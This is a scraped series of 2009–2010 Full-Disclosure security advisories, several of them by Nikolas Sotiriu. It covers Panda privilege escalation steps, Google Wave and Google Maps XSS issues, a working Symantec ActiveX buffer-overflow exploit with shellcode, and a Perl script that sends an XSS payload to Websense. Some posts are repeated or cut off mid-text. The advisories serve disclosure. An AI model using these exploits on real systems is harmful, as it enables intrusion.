__ Security Advisory NSOADV-2010-001 (Version 2) __ __ Title: Panda Security Local Privilege Escalation Severity: Medium Advisory ID:NSOADV-2010-001 Found Date: 02.2008 Date Reported: 30.11.2009 Release Date: 09.01.2010 Update Date:20.01.2010 Author: Nikolas Sotiriu (lofi) Website:http://sotiriu.de Mail: nso-research at sotiriu.de URL:http://sotiriu.de/adv/NSOADV-2010-001.txt Vendor: Panda Security (http://www.pandasecurity.com/) Affected Products: (Self tested) -Panda Security for Business 4.04.10 -Panda Security for Business with Exchange 4.04.10 -Panda Security for Enterprise 4.04.10 -Panda Internet Security 2010 (15.01.00) -Panda Global Protection 2010 (3.01.00) -Panda Antivirus Pro 2010 (9.01.00) -Panda Antivirus for Netbooks (9.01.00) (Provided by Panda) -Panda Global Protection 2009 -Panda Internet Security 2009 -Panda Antivirus Pro 2009 -Panda Internet Security 2008 -Panda Antivirus + Firewall 2008 -Panda Platinum 2007 Internet Security -Panda Platinum 2006 Internet Security Affected Component: Corporate Products: -Panda Security for Desktops 4.05.10 -Panda Security for File Servers 8.04.10 Remote Exploitable: No Local Exploitable: Yes Patch Status: Vendor released a patch (See Solution) Discovered by: Nikolas Sotiriu Disclosure Policy: http://sotiriu.de/policy.html Thanks to: Thierry Zoller: For the permission to use his Policy Background: === Panda Security for Product is the security solution for companies that need to protect their networks, mainly workstations and file servers. Panda Security for Business is centrally managed thanks to the AdminSecure Console, which allows monitoring the entire network, protecting your critical assets against all types of threats and optimizing productivity. (Product description from Panda Website) This vulnerability is similar to the following vulnerabilities in Panda products, which where discovered earlier: Sep 07 2006 3APA3A: http://www.securityfocus.com/bid/19891 Aug 02 2007 tarkus: http://www.securityfocus.com/bid/25186 Oct 31 2009 Protek: http://www.securityfocus.com/archive/1/507615 Nov 02 2009 Maxim: http://www.securityfocus.com/bid/36897 The earlier reported vulnerabilities only affected the Home user products. But the business products had the same bug. More interesting is, that Panda failed since 2006 each year by releasing the new version with the same old bug. Description: 1. 32Bit Version of Panda Security for Desktops/File Servers +--- During installation of Panda Security for Desktops/File Servers the permissions for installation folder %ProgramFiles%\Panda Software\AVTC\ by default are set to Everyone:Full Control. Few services (e.g. PAVSRV51.EXE) are started from this folder. Services are started under LocalSystem account. The 32bit Version of Panda Security for Desktops/File Servers installs the TruePrevent package by default, which protects the files in the installation directory from manipulation. If the TruePrevent Service (Panda TPSrv) is not running the files are completely unprotected. A normal user is not able to stop the service, but normally he can boot his workstation in SafeBoot mode, in which the TPSrv is not started and all services files can be manipulated. This can be exploited by: a. Boot the PC in SafeBoot mode, by pressing F8 during the boot process b. Rename PAVSRV51.exe to PAVSRV51.old in Panda folder c. Copy any application to PAVSRV51.exe d. Reboot Upon reboot trojaned application will be executed with LocalSystem account. Executable started as services: +-- %ProgramFiles%\PANDA SOFTWARE\AVTC\PSKMsSvc.exe (Desktop only) %ProgramFiles%\PANDA SOFTWARE\AVTC\PavSrv51.exe %ProgramFiles%\PANDA SOFTWARE\AVTC\PavFnSvr.exe %ProgramFiles%\PANDA SOFTWARE\AVTC\PSHost.exe %ProgramFiles%\PANDA SOFTWARE\AVTC\PsImSvc.exe %ProgramFiles%\PANDA SOFTWARE\AVTC\PsCtrlS.exe %ProgramFiles%\PANDA SOFTWARE\AVTC\TPSrv.exe 2. 64Bit Version of Panda Security for Desktops/File Servers
[Full-disclosure] NSOADV-2010-002: Google Wave Design Bugs
_ Security Advisory NSOADV-2010-002 _ _ Title: Google Wave Design Bugs Severity: Low Advisory ID:NSOADV-2010-002 Found Date: 16.11.2009 Date Reported: 18.11.2009 Release Date: 19.01.2010 Author: Nikolas Sotiriu (lofi) Mail: nso-research at sotiriu.de URL:http://sotiriu.de/adv/NSOADV-2010-002.txt Vendor: Google (http://www.google.com/) Affected Products: Google Wave Preview (Date: = 14.01.2010) Not Affected Component: Google Wave Preview (Date: = 14.01.2010) Remote Exploitable: Yes Local Exploitable: No Patch Status: partially patched Discovered by: Nikolas Sotiriu Disclosure Policy: http://sotiriu.de/policy.html Thanks to: Thierry Zoller: For the permission to use his Policy Background: === Google Wave is an online tool for real-time communication and collaboration. A wave can be both a conversation and a document where people can discuss and work together using richly formatted text, photos, videos, maps, and more. (Product description from Google Website) Description: All this possible attacks are the result of playing 4 hours with Google Wave. I didn't check all the funny stuff, which is possible with the Wave. 1. Gadget phishing attack: -- The Google Wave Gadget API can be used for phishing attacks. An attacker can build his own phishing Gadget, share it with his Google Wave contacts an hopefully get the login credentials from a user. This behavior is normal. The Problem is, that this bug makes it easier to steal logins. 2. Virus spreading attack: -- Uploads Files are not scanned for malicious code. An attacker could upload his malware to a wave and share it to his Google Wave contacts. Proof of Concept : == A proof of concept gadget can be found here: http://sotiriu.de/demos/phgadget.xml Solution: = 1. No changes made here. Workaround: Don't trust Waves. 2. Google builds in AV scanning. Disclosure Timeline (/MM/DD): = 2009.11.16: Vulnerability found 2009.11.17: Sent PoC, Advisory, Disclosure policy and planned disclosure date (2009.12.03) to Vendor 2009.11.23: Vendor response 2009.12.01: Ask for a status update, because the planned release date is 2009.12.03. 2009.12.03: Google Security Team asks for 2 more week to patch. 2009.12.03: Changed release date to 2009.12.17. 2009.12.15: Ask for a status update, because the planned release date is 2009.12.17. = No Response 2009.12.21: Ask for a status update. 2009.12.29: Google Security Team informs me, that there are no changes made before 2010.01.03. 2010.01.14: Google Security Team informs me, that uploaded files will be now scanned for malware. Google Gadgets will be not updated. 2010.01.19: Release of this Advisory ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google Maps XSS (currently unpatched)
Looks like a realy quick fix from google. directly after i got the PoC it worked. Now it doesn't Am 12.01.2010 13:58, schrieb Michael Lenz: Your PoC generates: *Google* Sorry... We're sorry... ... but your computer or network may be sending automated queries. To protect our users, we can't process your request right now. See Google Help http://www.google.com/support/bin/answer.py?answer=86640 for more information. © 2009 Google - Google Home http://www.google.com So..? gaurav baruah schrieb: Google Maps XSS (currently unpatched) Discovered By - Pratul Agrawal (pratu...@gmail.com) Gaurav Baruah (baruah.gau...@gmail.com) PoC - http://maps.google.com/maps?f=qsource=s_qhl=engeocode=q=%3Cscript%3Ealert(%22Google%20Sucks%20!%22)%3C/script%3Evps=1sll=28.613554,77.20906sspn=0.009136,0.013797ie=UTF8 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ gaurav baruah schrieb: Google Maps XSS (currently unpatched) Discovered By - Pratul Agrawal (pratu...@gmail.com) Gaurav Baruah (baruah.gau...@gmail.com) PoC - http://maps.google.com/maps?f=qsource=s_qhl=engeocode=q=%3Cscript%3Ealert(%22Google%20Sucks%20!%22)%3C/script%3Evps=1sll=28.613554,77.20906sspn=0.009136,0.013797ie=UTF8 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] NSOADV-2010-001: Panda Security Local Privilege Escalation
_ Security Advisory NSOADV-2010-001 _ _ Title: Panda Security Local Privilege Escalation Severity: Medium Advisory ID:NSOADV-2010-001 Found Date: 02.2008 Date Reported: 30.11.2009 Release Date: 09.01.2010 Author: Nikolas Sotiriu (lofi) Mail: nso-research at sotiriu.de URL:http://sotiriu.de/adv/NSOADV-2010-001.txt Vendor: Panda Security (http://www.pandasecurity.com/) Affected Products: (Self tested) -Panda Security for Business 4.04.10 -Panda Security for Business with Exchange 4.04.10 -Panda Security for Enterprise 4.04.10 -Panda Internet Security 2010 (15.01.00) -Panda Global Protection 2010 (3.01.00) -Panda Antivirus Pro 2010 (9.01.00) -Panda Antivirus for Netbooks (9.01.00) (Provided by Panda) -Panda Global Protection 2009 -Panda Internet Security 2009 -Panda Antivirus Pro 2009 -Panda Internet Security 2008 -Panda Antivirus + Firewall 2008 -Panda Platinum 2007 Internet Security -Panda Platinum 2006 Internet Security Affected Component: Corporate Products: -Panda Security for Desktops 4.05.10 -Panda Security for File Servers 8.04.10 Remote Exploitable: No Local Exploitable: Yes Patch Status: Vendor released a patch (See Solution) Discovered by: Nikolas Sotiriu Disclosure Policy: http://sotiriu.de/policy.html Thanks to: Thierry Zoller: For the permission to use his Policy Background: === Panda Security for Product is the security solution for companies that need to protect their networks, mainly workstations and file servers. Panda Security for Business is centrally managed thanks to the AdminSecure Console, which allows monitoring the entire network, protecting your critical assets against all types of threats and optimizing productivity. (Product description from Panda Website) This vulnerability is similar to the following vulnerabilities in Panda products, which where discovered earlier: Sep 07 2006 3APA3A: http://www.securityfocus.com/bid/19891 Aug 02 2007 tarkus: http://www.securityfocus.com/bid/25186 Oct 31 2009 Protek: http://www.securityfocus.com/archive/1/507615 Nov 02 2009 Maxim: http://www.securityfocus.com/bid/36897 The earlier reported vulnerabilities only affected the Home user products. But the business products had the same bug. More interesting is, that Panda failed since 2006 each year by releasing the new version with the same old bug. Description: 1. 32Bit Version of Panda Security for Desktops/File Servers +--- During installation of Panda Security for Desktops/File Servers the permissions for installation folder %ProgramFiles%\Panda Software\AVTC\ by default are set to Everyone:Full Control. Few services (e.g. PAVSRV51.EXE) are started from this folder. Services are started under LocalSystem account. The 32bit Version of Panda Security for Desktops/File Servers installs the TruePrevent package by default, which protects the files in the installation directory from manipulation. If the TruePrevent Service (Panda TPSrv) is not running the files are completely unprotected. A normal user is not able to stop the service, but normally he can boot his workstation in SafeBoot mode, in which the TPSrv is not started and all services files can be manipulated. This can be exploited by: a. Boot the PC in SafeBoot mode, by pressing F8 during the boot process b. Rename PAVSRV51.exe to PAVSRV51.old in Panda folder c. Copy any application to PAVSRV51.exe d. Reboot Upon reboot trojaned application will be executed with LocalSystem account. Executable started as services: +-- %ProgramFiles%\PANDA SOFTWARE\AVTC\PSKMsSvc.exe (Desktop only) %ProgramFiles%\PANDA SOFTWARE\AVTC\PavSrv51.exe %ProgramFiles%\PANDA SOFTWARE\AVTC\PavFnSvr.exe %ProgramFiles%\PANDA SOFTWARE\AVTC\PSHost.exe %ProgramFiles%\PANDA SOFTWARE\AVTC\PsImSvc.exe %ProgramFiles%\PANDA SOFTWARE\AVTC\PsCtrlS.exe %ProgramFiles%\PANDA SOFTWARE\AVTC\TPSrv.exe 2. 64Bit Version of Panda Security for Desktops/File Servers +--- During installation of Panda Security
[Full-disclosure] NSOADV-2009-001: Symantec ConsoleUtilities ActiveX Control buffer overflow
_
Security Advisory NSOADV-2009-001
_
_
Title: Symantec ConsoleUtilities ActiveX Control
Buffer Overflow
Severity: Critical
Advisory ID:NSOADV-2009-001
Found Date: 09.09.2009
Date Reported: 15.09.2009
Release Date: 02.11.2009
Author: Nikolas Sotiriu
Mail: nso-research at sotiriu.de
URL:http://sotiriu.de/adv/NSOADV-2009-001.txt
Vendor: Symantec (http://www.symantec.com/)
Affected Products: Symantec Altiris Notification Server 6.x
Symantec Management Platform 7.0.x
Symantec Altiris Deployment Solution 6.9.x
Affected Component: ConsoleUtilities ActiveX Control V.6.0.0.1846
Not Affected Component: ConsoleUtilities ActiveX Control V.6.0.0.2000
Remote Exploitable: Yes
Local Exploitable: No
CVE-ID: CVE-2009-3031
Patch Status: Vendor released an patch
Discovered by: Nikolas Sotiriu
Disclosure Policy: http://sotiriu.de/policy.html
Thanks to: Thierry Zoller: For the permission to use his
Policy
Background:
===
Altiris service-oriented management solutions provide a modular and
future-proof approach to managing highly diverse and widely distributed
IT infrastructures. They are open solutions that enable lifecycle
integration of client, handheld, server, network and other IT assets
with audit-ready security and automated operation.
(Product description from Symantec Website)
Description:
During the first access of the Management Website an ActiveX Control
will be installed (AeXNSConsoleUtilities.dll), in which the function
BrowseAndSaveFile is vulnerable to a stack based buffer overflow.
Name: ConsoleUtilities Class
Vendor: Altiris, Inc.
Type: ActiveX-Steuerelement
Version: 6.0.0.1846
GUID: {B44D252D-98FC-4D5C-948C-BE868392A004}
File: AeXNSConsoleUtilities.dll
Folder: C:\WINDOWS\system32
Proof of Concept :
==
html
titleNSOADV-2009-001/title
object classid='clsid:B44D252D-98FC-4D5C-948C-BE868392A004' id='obj'/
/object
script language='vbscript'
Sub Submit_OnClick
For i=0 to 2
If document.ret.os(i).checked Then
target=document.ret.os(i).value
End If
Next
EIP=unescape(target)
arg1 =
arg3 =
arg4 =
arg5 =
junk=String(310, A) 'junk
morejunk=String(18, unescape(%u0041)) 'more junk
// windows/exec - 224 bytes
// http://www.metasploit.com
// Encoder: x86/call4_dword_xor
// EXITFUNC=seh, CMD=calc.exe
code=unescape(%uc92b%ue983%ue8ce%u%u%u5ec0%u7681%ue60e_
%u2dad%u8338%ufcee%uf4e2%u451a%u38a4%uade6%ub14d_
%u9c03%u5cff%uff6d%ub31d%ua1b4%u6aa6%u26f2%u105f_
%u1ae9%u1e67%u52d7%uf81c%u914a%u444c%u81e4%uf90d_
%ua029%uff2c%u5d04%u6f7f%uff6d%ub33d%u91a4%ue82c_
%ued6d%ubd55%ud926%u3967%ufd36%u70a6%u26fe%u1875_
%u7ee7%u04ce%u26af%ub319%u7be7%uc71c%u6dd7%uf981_
%ua029%uff2c%u4dde%ucc58%ud0e5%u03d5%u899b%uda58_
%u26be%u1c75%u7ee7%ub34b%ue6ea%u60a6%uacfa%ub3fe_
%u26e2%ue82c%ue96f%u1c09%uf6bd%u614c%ufcbc%ud8d2_
%uf2be%ub377%u46f4%u65ab%uac8c%ubda0%uad5f%u382d_
%uc5b6%ub31c%u2a89%uedd2%u535d%u0a23%uc50c%uad8b_
%u305b%uedd2%uabda%u3251%u5666%u4dcd%u16e3%u2b6a_
%uc294%u3847%u52b5%u5bf8%uc187%u164e%ud583%u3848)
buf=junk+EIP+morejunk+break+code
obj.BrowseAndSaveFile arg1, buf, arg3, arg4, arg5
End Sub
/script
h2Symantec ConsoleUtilities ActiveX Control Buffer overflow PoC/h2
Use it only for education or ethical pentesting! The author accepts no
liability for damage caused by this tool.brNikolas Sotiriu (lofi)
(http://www.sotiriu.de/adv/NSOADV-2009-001.txt), 02.11.2009br
h3Some RET Infos:/h3
Overwrite EIP with (crash)br
EIP=String(2, unescape(%u4141))brbr
XP SP2 Ger shell32.dll JMP ESPbr
EIP=unescape(%uaf0a%u77d5)brbr
XP SP3 Ger shell32.dll JMP ESPbr
EIP=unescape(%u30D7%u7E68)brbr
form name=ret
input type=radio name=os value=%u4141%u4141
DoSbr
input type=radio name=os value=%uaf0a%u77d5
Windows XP SP2 Germanbr
input type=radio name=os value=%u30D7%u7E68
Windows XP SP3 Germanbr
input type=button name=Submit VALUE=Exploit
/form
img src=http://sotiriu.de/images/logo_wh_80.png;
/html
Solution:
=
Symantec Security Advisory:
http://tinyurl.com/y9fakve
Hotfix (KB49568): Deployment Solution 6.9 SP3
https://kb.altiris.com/display
[Full-disclosure] NSOADV-2009-003: Websense Email Security Cross Site Scripting
_
Security Advisory NSOADV-2009-003
_
_
Title: Websense Email Security Cross Site Scripting
Severity: Low
Advisory ID:NSOADV-2009-003
Found Date: 28.09.2009
Date Reported: 01.10.2009
Release Date: 20.10.2009
Author: Nikolas Sotiriu
Mail: nso-research (at) sotiriu.de
URL:http://sotiriu.de/adv/NSOADV-2009-003.txt
Vendor: Websense (http://www.websense.com/)
Affected Products: Websense Email Security v7.1
Personal Email Manager v7.1
Not Affected Products: Websense Email Security v7.1 Hotfix 4
Personal Email Manager v7.1 Hotfix 4
Remote Exploitable: Yes
Local Exploitable: Yes
Patch Status: Patched with Hotfix 4
Disclosure Policy: http://sotiriu.de/policy.html
Thanks to: Thierry Zoller: for the permission to use his
Policy
Background:
===
Websense Email Security software incorporates multiple layers of
real-time Web security and data security intelligence to provide
leading email protection from converged email and Web 2.0 threats.
It helps to manage outbound data leaks and compliance risk, and enables
a consolidated security strategy with the trusted leader in Essential
Information Protection.
(Product description from Websense Website)
The Websense Email Security Web Administrator is a webfrontend, which
enables you to access the message administration, directory management
and to view the log.
Description:
1. XSS in webfrontend:
--
The webfrontend do not properly sanitize some variables before being
returned to the user.
http://target:8181/web/msgList/viewmsg/actions/msgAnalyse.asp \
?Queue=Network%20SecurityFileName=[XSS]IsolatedMessageID=[XSS] \
ServerName=[XSS]Dictionary=[XSS]Scoring=[XSS]MessagePart=[XSS]
http://target:8181/web/msgList/viewmsg/actions/msgForwardToRis \
kFilter.asp?Queue=[XSS]FileName=[XSS]IsolatedMessageID=[XSS] \
ServerName=[XSS]
http://target:8181/web/msgList/viewmsg/viewHeaders.asp?Queue= \
[XSS]FileName=[XSS]IsolatedMessageID=[XSS]ServerName=[XSS]
This can be exploited to execute arbitrary HTML and script code in a
user's browser session in context of the Web Administrator frontend.
2. XSS in webfrontend through a Mail Subject:
-
The Subject of an email sent through the Websense Mail Security
server is not properly sanitized before shown in the Web Administrator
frontend.
Script code like scriptalert('X')/script will be executed in
the users's browser in context of the Web Administrator frontend.
The Mail has to be hold in a Queue to execute the code if the
administrator checks it. A Subject like
VIAGRAscriptalert('XSS')/script
will result in a hold in the Anti Spam Queue.
Proof of Concept :
==
#!/usr/bin/perl
use MIME::Lite;
use Net::SMTP;
(($server = $ARGV[0]) ($rcpt = $ARGV[1])) || die Usage: $0,
server Recipient \n;
my $from_address = 'x...@mail.com';
my $to_address = . $rcpt . ;
my $mail_host = $server;
my $subject = 'VIAGRA XSS File BODY ONLOAD=alert(\'XSS\')';
my $message_body = XSS Test File;
$msg = MIME::Lite-new (
From = $from_address,
To = $to_address,
Subject = $subject,
Type ='multipart/mixed'
) or die Error creating multipart container: $!\n;
$msg-attach (
Type = 'TEXT',
Data = $message_body
) or die Error adding the text message part: $!\n;
MIME::Lite-send('smtp', $mail_host, Timeout=60);
$msg-send;
Solution:
=
Vendor released a patch.
http://tinyurl.com/yhe3hqa
Disclosure Timeline (/MM/DD):
=
2009.09.28: Vulnerability found
2009.10.01: Ask for a PGP Key
2009.10.01: Websense sent there PGP Key
2009.10.01: Sent PoC, Advisory, Disclosure policy and planned disclosure
date to Vendor
2009.10.08: Websense verifies the finding
2009.10.13: Websense fixed it. The path will be available in Version 7.2
which will be released in ~2 weeks
2009.10.13: Ask for a list of affected versions/products and changed the
release date to 2009.10.29.
(no response)
2009.10.20: Found the KB article and the Hotfix on Websense website
2009.10.20: Release of this advisory
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
